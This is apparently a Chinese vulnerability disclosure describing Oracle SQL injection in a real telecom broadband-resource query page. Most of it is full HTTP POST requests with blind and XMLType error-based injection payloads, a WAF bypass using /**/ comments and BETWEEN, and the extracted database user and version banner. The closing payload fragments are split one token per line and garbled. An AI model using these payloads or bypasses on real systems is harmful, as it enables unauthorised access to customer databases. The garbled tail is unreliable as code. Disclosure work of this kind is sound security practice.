Oracle盲注--注意一些函数

previous page next page

使用福建地区的帐号登录后,点击我的服务-宽带资源查询,输入手机号后点击下一步,可以看到这么一条HTTP请求:

这里的 ADDRNAME 参数可注入:

经测试,WAF会匹配如下关键词

code 区域 
      and

 or

select


使用/**/代替其中的空格(%20)即可绕过WAF;该WAF还会将传入的<>转为&lt;&gt;,在部分SQL语句中,可以使用BETWEEN AND等来替代大于小于这些运算符。

可以写个脚本来盲注(此处演示仅证明可行性):

code 区域 
      POST /ServiceOrderAjax.do HTTP/1.1

Origin: http://**.**.**.**

Content-Length: 181

Accept-Language: zh-CN,zh;q=0.8

Accept-Encoding: gzip,deflate

Host: **.**.**.**

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 QIHU 360EE

Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Connection: close

X-Requested-With: XMLHttpRequest

Pragma: no-cache

Cache-Control: no-cache

Referer: http://**.**.**.**/service/transaction_new/lan/queryResources.jsp

Content-Type: application/x-www-form-urlencoded

Cookie: 


method=queryAddrByNameInPage&PARENTADDRID=1058224&AREACODE=591&ADDRNAME='/**/AND ascii(substr((select/**/user from dual),1,1)) between 81/**/and 85/**/AND '%'='&FROMCODE=1&ENDCODE=2

传入真时返回地区数据,传入假时返回"未查询到任何结果"

通过该方法获取到当前用户名长度为3, ascii码分别为83 82 77, 对应"SRM"。

也可以通过XML报错的方式来获取数据:

code 区域 
      POST /ServiceOrderAjax.do HTTP/1.1

Origin: http://**.**.**.**

Content-Length: 245

Accept-Language: zh-CN,zh;q=0.8

Accept-Encoding: gzip,deflate

Host: **.**.**.**

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 QIHU 360EE

Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Connection: close

X-Requested-With: XMLHttpRequest

Pragma: no-cache

Cache-Control: no-cache

Referer: http://**.**.**.**/service/transaction_new/lan/queryResources.jsp

Content-Type: application/x-www-form-urlencoded

Cookie: 


method=queryAddrByNameInPage&PARENTADDRID=1058224&AREACODE=591&ADDRNAME='/**/AND 1=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||(utl_raw.cast_to_raw((SELECT/**/banner from v$version where rownum=1))))) FROM DUAL)/**/AND '%'='&FROMCODE=1&ENDCODE=30

code 区域 
      得到

4F7261636C652044617461626173652031306720456E74657270726973652045646974696F6E2052656C656173652031302E322E302E332E30202D2036346269

解码后为

Oracle Database 10g Enterprise Edition Release **.**.**.**.0 - 64bi

(不知道为什么少了一个t,求指导)

code 区域 
      '/**/AND 1=(SELECT/**/UPPER(XMLType(CHR(60)||CHR(58)||((SELECT/**/user from dual where rownum=1)))) FROM DUAL)/**/AND '%'='

可得到当前用户名确实为SRM。

当前用户权限类型为PLUSTRACE哦 ._.

      
    
        
  1. 
          
            and
            /**/
            ascii
            (
            substr
            (
            SYS_CONTEXT
            (
            'USERENV'
            ,
            'CURRENT_USER'
            ),%
            s
            ,
            1
            ))=
            '%s
          
        
    2. 
      

    
        
    
          
  1. 
            
              USER
              :
            
          
    2. 
          
  2. 
            
              ascii
              (
              substr
              (
              SYS_CONTEXT
              (
              'USERENV'
              ,
              'CURRENT_USER'
              ),
              1
              ,
              1
              ))=
              1
            
          
    3. 
          
  3. 
            
              and
              /**/
              length
              (
              SYS_CONTEXT
              (
              'USERENV'
              ,
              'CURRENT_USER'
              ))=
              5
            
          
    4.

previous page start next page